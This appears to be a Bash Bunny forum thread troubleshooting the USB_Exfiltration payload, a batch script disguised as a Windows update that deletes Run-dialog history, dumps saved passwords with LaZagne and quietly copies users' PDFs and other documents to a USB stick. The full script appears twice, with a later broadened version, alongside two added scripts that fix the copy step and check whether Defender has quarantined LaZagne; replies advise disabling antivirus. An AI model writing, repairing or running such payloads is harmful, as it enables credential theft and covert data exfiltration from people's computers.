
Problem with USB_Exfiltration


CuChulaind


Hello,

New to the BB, and testing out some payloads. I have updated my BB, been able to connect serially, share my network connection with the device on Windows (not so much with bb.sh using Arch), and ssh into the device as well.

I have successfully run the notepad payload that creates the notepad file about locking your computer.

I am unlucky with the usb_exfiltrator payload. I have installed laZagne.exe, but I'm not so concerned about the passwords right now. When I run the payload, I expect a new directory in loot to be created, named after my hostname, with 1 PDF file in that directory. In my loot directory I also expect to see a password file.

I did make a copy of the REM line that copies any .pdf file, and removed the /E flag (so as not to look in subdirectories) to keep it simple:

     xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul

After running the payload (on my Win 10 machine), my loot directory contains a new directory named my victim hostname, however that directory is empty. A password file is also created in the loot directory, however it is empty. Among my files and directories in my Documents directory I do have 1 pdf, which I expected to be copied to the Bash Bunny loot directory under the created hostname directory.

Suggestions / Corrections greatly appreciated!

Thank you.

Entire e.cmd file:

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates a directory named from the computer name, date and time.
REM %~dp0 = drive and path of this batch file (ends with a backslash); %COMPUTERNAME%, %date% and %time% are self-explanatory.
REM The %date%/%time% substrings assume the US layout (ddd MM/dd/yyyy and HH:mm:ss.cc). %time% has a leading
REM space before 10:00, so that space is replaced with 0 and every path is quoted.
setlocal
cd /d "%~dp0"
set "stamp=%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%"
set "stamp=%stamp: =0%"
set "loot=%~dp0..\..\loot\USB_Exfiltration"

REM This executes LaZagne from the payload directory and writes the password file to loot, with date and time in the name.
"%~dp0laZagne.exe" all > "%loot%\%COMPUTERNAME%_%stamp%_passwords.txt"

REM Everything below is the file copy; drop it if you only want the passwords.
set "dst=%loot%\%COMPUTERNAME%_%stamp%"
mkdir "%dst%" 2>nul

if exist "%USERPROFILE%\Documents\" (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to a destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E "%USERPROFILE%\Documents\*.pdf" "%dst%\" >nul

xcopy /C /Q /G /Y "%USERPROFILE%\Documents\*.pdf" "%dst%\" >nul

REM Same as above, but /S does not create empty directories
REM xcopy /C /Q /G /Y /S "%USERPROFILE%\Documents\*.flac" "%dst%\" >nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

 

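The thread never pins down why the loot directory stays empty, so here is an added diagnostic version of the copy section. It is not the original USB_Exfiltration e.cmd and not CuChulaind's code. It removes two things in the posted lines that can silently break the copy: the %date%/%time% substring slicing, whose layout depends on the Windows regional settings and which leaves a space in the path before 10:00, and the unquoted %dst%. It also writes a log into the loot directory with the number of files that matched each pattern and xcopy's exit code, so "nothing matched" and "copy failed" can be told apart. Assumed: it runs from the payload folder on the Bunny like the original (so ..\..\loot resolves), and powershell.exe is on the target's PATH for the timestamp.

```batch
@echo off
REM Added diagnostic example; not the original USB_Exfiltration e.cmd.
REM Assumes: runs from the payload folder on the Bash Bunny (so ..\..\loot
REM resolves) and powershell.exe is on PATH on the target.
setlocal EnableDelayedExpansion
set "BASE=%~dp0..\..\loot\USB_Exfiltration"

REM Locale-independent timestamp (the original slices %date%/%time%, whose
REM layout depends on the regional settings and carries a space before 10:00).
for /f %%T in ('powershell -NoProfile -Command "Get-Date -Format yyyyMMdd_HHmmss"') do set "STAMP=%%T"
if not defined STAMP set "STAMP=nostamp"

set "DST=%BASE%\%COMPUTERNAME%_%STAMP%"
set "LOG=%DST%\_collect.log"
mkdir "%DST%" 2>nul
if not exist "%DST%\" (
    echo ERROR: cannot create "%DST%" 1>&2
    exit /b 1
)
echo loot dir: %DST% > "%LOG%"

REM One call per source folder and pattern; add patterns as needed.
call :collect "%USERPROFILE%\Documents" *.pdf
call :collect "%USERPROFILE%\Desktop"   *.pdf

echo --- files now in loot dir --- >> "%LOG%"
dir /b /s "%DST%" >> "%LOG%"
endlocal
exit /b 0

:collect
REM usage: call :collect "folder" pattern
if not exist "%~1\" (
    echo [%~1] does not exist, skipped >> "%LOG%"
    exit /b 0
)
REM Count matches first so "nothing matched" is distinguishable from a failed copy.
set /a N=0
for %%F in ("%~1\%~2") do set /a N+=1
echo [%~1] %~2 matches: !N! >> "%LOG%"
if !N! EQU 0 exit /b 0
REM /I: treat the destination as a directory. xcopy exit codes: 0 ok,
REM 1 no files found, 4 initialisation/path error, 5 disk write error.
xcopy /C /Q /G /Y /I "%~1\%~2" "%DST%\" >> "%LOG%" 2>&1
echo [%~1] xcopy exit code: %errorlevel% >> "%LOG%"
exit /b 0
```

Read _collect.log in the new loot folder after a run: a "matches: 0" line means the pattern found nothing in that folder on the victim, while a non-zero xcopy exit code with a positive match count points at the destination path or the mass-storage mount.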

  • 1 month later...

I am facing the same problem.

But I ran some tests and have part of the answer.

When I plugged in the BB the first time, I only had 1 empty folder in the loot folder. When I plugged in the BB a second time (without deleting the first, empty result folder), I had a second folder AND an empty passwords.txt file.

USB_exfiltration uses LaZagne, and LaZagne is detected by antivirus.

So, when I put LaZagne.exe in the tools folder on the BB, unplug the BB, put it in attack mode and plug it in again, the LaZagne in the tools folder is silently deleted.
When I disable my Windows Defender and repeat the same action, after the second plug-in, BOOM, the passwords.txt file is filled with all my passwords AND LaZagne is still present in the tools folder.

Conclusion: for password extraction, USB_exfiltration AND PasswordGrabber are blocked because they use LaZagne, which is detected, blocked and deleted by antivirus.

But for the file copy, I don't know why it doesn't work.

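The post above works out by trial that Defender removes laZagne.exe from the Bunny's storage on plug-in, which is why passwords.txt comes out empty. An added pre-flight check, not part of the USB_Exfiltration payload or of this poster's script, makes that visible in the loot log instead of leaving it to guesswork: it records whether laZagne.exe is still present (and its SHA-256, so a swapped or truncated binary is noticed), whether Defender real-time protection is on, and the last few Defender detections, and only then runs the tool. Assumed: the script runs from the payload folder as the original does, and the Defender PowerShell module (Get-MpComputerStatus, Get-MpThreatDetection) is available, as it is on Windows 10 with Defender installed; if the Defender service is off those cmdlets fail and the error lands in the log, which is itself the answer.

```batch
@echo off
REM Added pre-flight example; not part of the USB_Exfiltration payload.
REM Assumes: runs from the payload folder on the Bash Bunny, and the target has
REM the Defender PowerShell module (Windows 10 with Defender present).
setlocal
set "TOOL=%~dp0laZagne.exe"
set "LOOT=%~dp0..\..\loot\USB_Exfiltration"
set "LOG=%LOOT%\preflight_%COMPUTERNAME%.log"
if not exist "%LOOT%\" mkdir "%LOOT%"

echo === preflight %date% %time% === >> "%LOG%"

if exist "%TOOL%" (
    echo laZagne.exe present >> "%LOG%"
    REM Hash line only; filters certutil's header and footer, which both contain "hash".
    certutil -hashfile "%TOOL%" SHA256 | findstr /v /i "hash" >> "%LOG%"
) else (
    echo laZagne.exe MISSING: probably quarantined on an earlier plug-in >> "%LOG%"
)

REM Defender state and the five most recent detections (tool path and whether the
REM action succeeded). Errors from a stopped Defender service go to the log too.
powershell -NoProfile -ExecutionPolicy Bypass -Command "$s = Get-MpComputerStatus; 'RealTimeProtection=' + $s.RealTimeProtectionEnabled; 'EngineVersion=' + $s.AMEngineVersion; Get-MpThreatDetection | Sort-Object InitialDetectionTime -Descending | Select-Object -First 5 | ForEach-Object { $_.InitialDetectionTime.ToString('s') + ' ' + ($_.Resources -join ';') + ' actionSuccess=' + $_.ActionSuccess }" >> "%LOG%" 2>&1

REM Only attempt the dump when the binary survived; otherwise the empty
REM passwords file is expected and the log already says why.
if exist "%TOOL%" (
    "%TOOL%" all > "%LOOT%\%COMPUTERNAME%_passwords.txt" 2>> "%LOG%"
) else (
    echo LaZagne run skipped >> "%LOG%"
)
endlocal
```

On a machine where real-time protection is on, the detection lines will name the path on the Bunny's mass-storage volume and actionSuccess=True, matching the "silently deleted" behaviour described above; with protection off, the hash line and a filled passwords file should both appear.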

First, the part of LaZagne that does mimikatz will not work on Win10 because it uses the old Invoke-Mimikatz PowerShell script, which doesn't work in Win10 anymore. If you compile from source you can probably replace that section with the new one I posted about in the forums and it will work.

Next, AV will see mimi and the other payloads. I played with Win10 AV to see how well it detects, and it detects even encrypted Posh scripts because they eventually have to be decrypted to run, and that is when AV gets them, so it is safe to say you will need AV hindered to run this payload.

For the copy script, the only question I have is: are there any PDF files in the Documents folder? If there aren't, there is nothing to copy.


  • 4 years later...

Hi, will this code work or do I have to change some stuff?

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates a directory named from the computer name, date and time.
REM %~dp0 = drive and path of this batch file (ends with a backslash); %COMPUTERNAME%, %date% and %time% are self-explanatory.
REM The %date%/%time% substrings assume the US layout (ddd MM/dd/yyyy and HH:mm:ss.cc). %time% has a leading
REM space before 10:00, so that space is replaced with 0 and every path is quoted.
setlocal
cd /d "%~dp0"
set "stamp=%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%"
set "stamp=%stamp: =0%"
set "loot=%~dp0..\..\loot\USB_Exfiltration"

REM This executes LaZagne from the payload directory and writes the password file to loot, with date and time in the name.
"%~dp0laZagne.exe" all > "%loot%\%COMPUTERNAME%_%stamp%_passwords.txt"

REM Everything below is the file copy; drop it if you only want the passwords.
set "dst=%loot%\%COMPUTERNAME%_%stamp%"
mkdir "%dst%" 2>nul

REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to a destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /S Copies directories and subdirectories, except empty ones.

REM Copy documents and pictures from the Documents, Downloads and Desktop folders.
REM Each source folder goes into its own subfolder of %dst% so same-named files do not overwrite each other.
for %%D in (Documents Downloads Desktop) do (
    if exist "%USERPROFILE%\%%D\" (
        for %%X in (pdf doc docx xlsx jpg png gif txt) do (
            xcopy /C /Q /G /Y /S "%USERPROFILE%\%%D\*.%%X" "%dst%\%%D\" >nul
        )
    )
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

4 hours ago, tuug said:

do i have to change some stuff

If you run the script, you will probably become aware of what's needed. As has already been said in the thread, laZagne will probably not work; adjustments are perhaps needed depending on what kind of user the Windows box has; the PowerShell line most likely needs to be changed since it doesn't include a bypass of the execution policy, etc.


Archived

This topic is now archived and is closed to further replies.
